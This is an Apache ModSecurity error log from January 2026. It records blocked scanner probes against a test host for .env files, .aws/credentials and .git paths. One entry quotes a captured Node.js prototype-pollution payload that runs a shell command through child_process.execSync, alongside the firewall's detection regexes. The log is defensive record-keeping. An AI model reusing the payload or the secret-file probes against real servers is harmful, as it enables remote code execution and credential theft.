[Sun Jan 11 00:25:08.824166 2026] [:error] [pid 1333013] [client 45.148.10.204:47094] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aWLf1HP26iTcPSppCtdZIAAAAAU"]
[Sun Jan 11 00:25:08.909782 2026] [:error] [pid 1333040] [client 45.148.10.204:47106] [client 45.148.10.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/plugins/wp-mail-smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/plugins/wp-mail-smtp/.env"] [unique_id "aWLf1Jci0alMQ4Ji3YDd5wAAAAM"]
[Sun Jan 11 00:25:08.909992 2026] [:error] [pid 1333040] [client 45.148.10.204:47106] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/plugins/wp-mail-smtp/.env"] [unique_id "aWLf1Jci0alMQ4Ji3YDd5wAAAAM"]
[Sun Jan 11 00:25:08.910140 2026] [:error] [pid 1333040] [client 45.148.10.204:47106] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/plugins/wp-mail-smtp/.env"] [unique_id "aWLf1Jci0alMQ4Ji3YDd5wAAAAM"]
[Sun Jan 11 00:25:17.003009 2026] [:error] [pid 1333044] [client 45.148.10.204:47116] [client 45.148.10.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWLf3aE6Fp-poM0CC5YFhAAAAAQ"]
[Sun Jan 11 00:25:17.003237 2026] [:error] [pid 1333044] [client 45.148.10.204:47116] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWLf3aE6Fp-poM0CC5YFhAAAAAQ"]
[Sun Jan 11 00:25:17.003397 2026] [:error] [pid 1333044] [client 45.148.10.204:47116] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWLf3aE6Fp-poM0CC5YFhAAAAAQ"]
[Sun Jan 11 00:25:29.779245 2026] [:error] [pid 1333040] [client 45.148.10.204:35330] [client 45.148.10.204] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWLf6Zci0alMQ4Ji3YDd6AAAAAM"]
[Sun Jan 11 00:25:29.779462 2026] [:error] [pid 1333040] [client 45.148.10.204:35330] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWLf6Zci0alMQ4Ji3YDd6AAAAAM"]
[Sun Jan 11 00:25:29.779610 2026] [:error] [pid 1333040] [client 45.148.10.204:35330] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWLf6Zci0alMQ4Ji3YDd6AAAAAM"]
[Sun Jan 11 00:25:43.949136 2026] [authz_core:error] [pid 1333011] [client 45.148.10.204:62682] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Sun Jan 11 00:25:46.178524 2026] [authz_core:error] [pid 1333014] [client 45.148.10.204:62704] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 11 00:25:48.248600 2026] [authz_core:error] [pid 1333012] [client 45.148.10.204:42302] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Sun Jan 11 00:25:50.338426 2026] [authz_core:error] [pid 1333013] [client 45.148.10.204:42312] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig
[Sun Jan 11 00:25:54.411083 2026] [authz_core:error] [pid 1333040] [client 45.148.10.204:42328] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php.bak
[Sun Jan 11 05:25:06.389298 2026] [:error] [pid 1336277] [client 45.148.10.87:41514] [client 45.148.10.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWMmIjFN_Zwgq5LReiTuNAAAAAA"]
[Sun Jan 11 05:25:06.389538 2026] [:error] [pid 1336277] [client 45.148.10.87:41514] [client 45.148.10.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWMmIjFN_Zwgq5LReiTuNAAAAAA"]
[Sun Jan 11 05:25:06.389686 2026] [:error] [pid 1336277] [client 45.148.10.87:41514] [client 45.148.10.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWMmIjFN_Zwgq5LReiTuNAAAAAA"]
[Sun Jan 11 05:25:10.479216 2026] [:error] [pid 1336281] [client 45.148.10.87:41526] [client 45.148.10.87] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWMmJsh5fehf2NO8kLqyJAAAAAQ"]
[Sun Jan 11 05:25:10.479377 2026] [:error] [pid 1336281] [client 45.148.10.87:41526] [client 45.148.10.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWMmJsh5fehf2NO8kLqyJAAAAAQ"]
[Sun Jan 11 05:25:10.479680 2026] [:error] [pid 1336281] [client 45.148.10.87:41526] [client 45.148.10.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWMmJsh5fehf2NO8kLqyJAAAAAQ"]
[Sun Jan 11 05:25:10.479835 2026] [:error] [pid 1336281] [client 45.148.10.87:41526] [client 45.148.10.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWMmJsh5fehf2NO8kLqyJAAAAAQ"]
[Sun Jan 11 05:25:12.581378 2026] [:error] [pid 1336312] [client 45.148.10.87:41532] [client 45.148.10.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWMmKF-i8Gq6RjjcOdp_iAAAAAY"]
[Sun Jan 11 05:25:12.581607 2026] [:error] [pid 1336312] [client 45.148.10.87:41532] [client 45.148.10.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWMmKF-i8Gq6RjjcOdp_iAAAAAY"]
[Sun Jan 11 05:25:12.581756 2026] [:error] [pid 1336312] [client 45.148.10.87:41532] [client 45.148.10.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWMmKF-i8Gq6RjjcOdp_iAAAAAY"]
[Sun Jan 11 05:25:14.681618 2026] [:error] [pid 1336279] [client 45.148.10.87:21498] [client 45.148.10.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWMmKqsH2Fmb2xrBscyaGAAAAAI"]
[Sun Jan 11 05:25:14.681837 2026] [:error] [pid 1336279] [client 45.148.10.87:21498] [client 45.148.10.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWMmKqsH2Fmb2xrBscyaGAAAAAI"]
[Sun Jan 11 05:25:14.681994 2026] [:error] [pid 1336279] [client 45.148.10.87:21498] [client 45.148.10.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWMmKqsH2Fmb2xrBscyaGAAAAAI"]
[Sun Jan 11 05:25:43.261785 2026] [authz_core:error] [pid 1336306] [client 45.148.10.87:5000] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sun Jan 11 05:25:51.335431 2026] [authz_core:error] [pid 1336277] [client 45.148.10.87:5012] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 11 22:26:19.673966 2026] [:error] [pid 1348468] [client 204.76.203.25:43420] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQVewHQ2lCZvQ3fxXJDcAAAAAA"]
[Sun Jan 11 22:26:19.674210 2026] [:error] [pid 1348468] [client 204.76.203.25:43420] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQVewHQ2lCZvQ3fxXJDcAAAAAA"]
[Sun Jan 11 22:26:19.674378 2026] [:error] [pid 1348468] [client 204.76.203.25:43420] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWQVewHQ2lCZvQ3fxXJDcAAAAAA"]
[Thu Jan 15 17:26:31.465637 2026] [:error] [pid 1422354] [client 194.110.207.205:39290] [client 194.110.207.205] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWkVN79cPrphjC1uJYw6JAAAAAE"]
[Thu Jan 15 17:26:31.467140 2026] [:error] [pid 1422354] [client 194.110.207.205:39290] [client 194.110.207.205] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWkVN79cPrphjC1uJYw6JAAAAAE"]
[Thu Jan 15 17:26:31.467319 2026] [:error] [pid 1422354] [client 194.110.207.205:39290] [client 194.110.207.205] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWkVN79cPrphjC1uJYw6JAAAAAE"]
[Fri Jan 16 03:23:35.715831 2026] [authz_core:error] [pid 1444034] [client 195.178.110.191:12768] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 17 12:22:13.814780 2026] [:error] [pid 1465654] [client 65.2.167.119:44256] [client 65.2.167.119] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWtw5Tsg88Fnk7qcsG1nDAAAAAY"]
[Sat Jan 17 12:22:13.816713 2026] [:error] [pid 1465654] [client 65.2.167.119:44256] [client 65.2.167.119] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWtw5Tsg88Fnk7qcsG1nDAAAAAY"]
[Sat Jan 17 12:22:13.817975 2026] [:error] [pid 1465654] [client 65.2.167.119:44256] [client 65.2.167.119] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWtw5Tsg88Fnk7qcsG1nDAAAAAY"]
[Sat Jan 17 12:22:13.818141 2026] [:error] [pid 1465654] [client 65.2.167.119:44256] [client 65.2.167.119] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWtw5Tsg88Fnk7qcsG1nDAAAAAY"]
[Sat Jan 17 13:58:05.725468 2026] [:error] [pid 1465656] [client 204.76.203.25:59574] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWuHXQuey-R96faqoviP0wAAAAg"]
[Sat Jan 17 13:58:05.725738 2026] [:error] [pid 1465656] [client 204.76.203.25:59574] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWuHXQuey-R96faqoviP0wAAAAg"]
[Sat Jan 17 13:58:05.725899 2026] [:error] [pid 1465656] [client 204.76.203.25:59574] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWuHXQuey-R96faqoviP0wAAAAg"]
